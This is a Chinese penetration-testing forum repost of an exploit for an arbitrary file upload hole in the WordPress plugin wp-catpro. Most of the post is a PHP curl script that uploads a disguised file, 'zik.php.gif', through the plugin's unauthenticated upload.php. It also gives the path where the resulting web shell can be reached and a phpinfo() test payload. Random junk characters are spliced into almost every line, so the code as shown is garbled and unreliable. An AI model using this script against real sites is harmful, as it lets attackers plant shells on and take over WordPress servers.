中国网络渗透测试联盟

标题: WordPress插件wp-catpro任意文件上传 [打印本页]

作者: admin    时间: 2013-2-27 20:12
标题: WordPress插件wp-catpro任意文件上传
Wordpress plugins - wp-catpro Arbitrary File Upload Vulnerability) G9 ]! b# j) w% ?$ j
#-----------------------------------------------------------------------
5 ^/ M& }$ h4 Y
. w1 d- O. d/ Q5 ]# a作者  => Zikou-16
+ O% O+ K1 S+ f4 C$ k4 [9 u邮箱 => zikou16x@gmail.com3 ]3 N+ ^' N3 V% ^
测试系统 : Windows 7 , Backtrack 5r3! ]  N5 v: e2 x1 f  U+ o
下载地址 : http://xmlswf.com/images/stories/WP_plugins/wp-catpro.zip) D/ d0 A$ y$ K5 z2 k' p9 t
####
& q* |0 \8 F/ j- }5 [7 ?$ J
6 _* |2 H3 I( {3 P  ^' ?9 Y#=> Exploit 信息:( Q$ E4 L& Z2 o. l/ l, Z# a! G
------------------
" ^) b# c5 x8 ~# 攻击者可以上传 file/shell.php.gif
# O& q" X6 I% I# ("jpg", "gif", "png")  // Allowed file extensions
  f5 P1 [+ G% y. u1 E# "/uploads/";  // The path were we will save the file (getcwd() may not be reliable and should be tested in your environment)/ F0 o' l4 G  e' [' w! o4 B, \
# '.A-Z0-9_ !@#$%^&()+={}\[\]\',~`-'; // Characters allowed in the file name (in a Regular Expression format)0 f' [3 C- R1 Z% J; Q
------------------
3 l( N1 w& O$ s ' B1 m0 @' `: g6 X, {- e5 s
#=> Exploit5 h1 C! [) n6 u
-----------% q3 C) J: t+ ]
<?php# j# k' @3 A) C6 O9 o2 ~
% h; G) u7 p/ \& O: ~* r; O
$uploadfile="zik.php.gif";
* X& a9 N1 j. a; v5 D8 H& W$ch = curl_init("http://[ www.2cto.com ]/[path]/wp-content/plugins/wp-catpro/js/swfupload/js/upload.php");
; C: D7 m5 N3 \' ocurl_setopt($ch, CURLOPT_POST, true);, o! _8 A! u: I' {  p$ B: A
curl_setopt($ch, CURLOPT_POSTFIELDS,$ F+ m! k" ]$ Y2 D
array('Filedata'=>"@$uploadfile",  V8 M6 K4 m, l; r7 ]7 I! o
'folder'=>'/wp-content/uploads/catpro/'));) b1 X; p  P, v/ f; R' W# H7 m
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
* v) G9 r8 M; x: S$postResult = curl_exec($ch);
( k0 y* a+ h3 {! m- h. @curl_close($ch);
5 {) p* @1 p+ H) p4 r4 b
; ~* q# i: `6 _, Eprint "$postResult";
6 f' I) H3 o% ]: r4 w% f) O ; Z  h: ?4 C: P; x
Shell Access : http://[ www.xxx.com ]/[path]/wp-content/uploads/catpro/random_name.php.gif5 ?, m0 a( Y  T' z% x
  ?>
8 N1 [7 Z' T( S8 n$ M<?php6 t& v4 e  K1 G, J
phpinfo();, b& g! t( M# s9 C5 ~# J( }" X
?>




欢迎光临 中国网络渗透测试联盟 (https://www.cobjon.com/) Powered by Discuz! X3.2